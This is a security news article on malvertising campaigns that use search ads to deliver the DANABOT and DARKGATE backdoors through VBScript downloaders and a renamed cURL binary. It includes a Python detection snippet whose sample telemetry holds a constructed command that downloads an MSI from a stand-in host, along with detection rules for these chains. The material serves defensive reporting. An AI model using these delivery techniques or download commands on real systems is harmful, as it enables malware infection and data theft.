Hackers Abusing Search Engine Ads to Deliver DANABOT & DARKGATE Malware
Threat actors are buying adverts for malicious websites to lure victims into downloading malware, which is known to eventually lead to data theft and ransomware.
This technique has been used on many advertising platforms, including search engine ads and social media ads, because they offer a wide range of targeting controls such as specific audiences, geographic areas, IP address ranges, browsing history, and device types.
Search Engine Ads Bring Malware
According to the report shared with Cyber Security News, four different malware families were observed during the investigation of these malicious ad campaigns:
- PAPERDROP – VBScript-based downloader that communicates over HTTPS and downloads and executes DANABOT.
- PAPERTEAR – VBScript-based downloader observed enumerating the list of local processes.
- DANABOT – Backdoor written in Delphi that uses a custom binary protocol over TCP.
- DARKGATE – Backdoor written in Delphi that is capable of capturing keystrokes, executing commands, transferring files, and stealing credentials.
In addition, three different delivery chains were observed; two of them used a renamed version of the cURL binary.
Infection Chain #1: PAPERDROP > DANABOT
In this infection chain, the wscript.exe process is used to initiate a DNS request and then execute the Windows Installer utility msiexec.exe, which installs an application. It then uses the rundll32.exe process to load the dropper DLL and executes the “start” function to launch the DANABOT payload.
Infection Chain #2: PAPERTEAR > RENAMED CURL > DARKGATE
In this second infection chain, the PAPERTEAR downloader initiates an HTTP POST request to infocatalog[.]pics over port 8080. After this, wscript.exe executes a one-liner command that eventually drops the DARKGATE malware onto the victim’s system.
Infection Chain #3: PAPERDROP > RENAMED CURL > DANABOT
The third execution chain is similar to the second one, but here the PAPERDROP downloader executes another extended one-liner that uses the renamed curl.exe binary to download and install a malicious package file, which drops the DANABOT malware.
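As an added example (not code from the article or from the underlying report), the following Python snippet shows the detection logic a defender could run over process-creation telemetry for the behaviour common to these three chains: a script host spawning msiexec.exe or rundll32.exe, and a cURL binary running under a file name other than curl.exe. The event records are constructed Sysmon Event ID 1-style dictionaries, and the field names (Image, ParentImage, OriginalFileName, CommandLine) are assumptions.

```python
from pathlib import PureWindowsPath

# Process names that match the behaviour described in the three chains
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = {"msiexec.exe", "rundll32.exe"}  # chain #1: installer / DLL loader

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (empty string if none)."""
    return PureWindowsPath(path).name.lower()

def classify(event: dict) -> list:
    """Return the rule names a process-creation event matches (empty if none)."""
    hits = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    original = event.get("OriginalFileName", "").lower()
    if parent in SCRIPT_HOSTS and image in LOLBINS:
        # Chain #1: wscript.exe hands off to msiexec.exe / rundll32.exe
        hits.append("script_host_spawns_lolbin")
    if original == "curl.exe" and image != "curl.exe":
        # Chains #2/#3: PE version info still says curl.exe, on-disk name differs
        hits.append("renamed_curl")
        if parent in SCRIPT_HOSTS:
            hits.append("script_host_spawns_renamed_curl")
    return hits

# Constructed sample telemetry (assumed field names, not indicators from the report)
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\Public\pkg.msi /qn"},
    {"Image": r"C:\Users\Public\wget.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": r"wget.exe -o C:\Users\Public\p.msi http://example.invalid/p"},
    {"Image": r"C:\Windows\System32\curl.exe",          # legitimate curl, benign parent
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe -O https://example.invalid/file"},
    {"Image": r"C:\Windows\System32\msiexec.exe",       # installer service, benign parent
     "ParentImage": r"C:\Windows\System32\services.exe",
     "OriginalFileName": "msiexec.exe",
     "CommandLine": "msiexec.exe /V"},
]

def scan(events: list) -> list:
    """Return (image, matched rules) for every event that matches at least one rule."""
    results = []
    for event in events:
        hits = classify(event)
        if hits:
            results.append((event["Image"], hits))
    return results
```

Only the two events that mirror the chains above are flagged; the stock curl.exe and the service-launched msiexec.exe produce no hits.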
Furthermore, a complete report has been published that provides detailed information about the malware capabilities, execution methods, chains, and other data.
Indicators of Compromise
Source credit: cybersecuritynews.com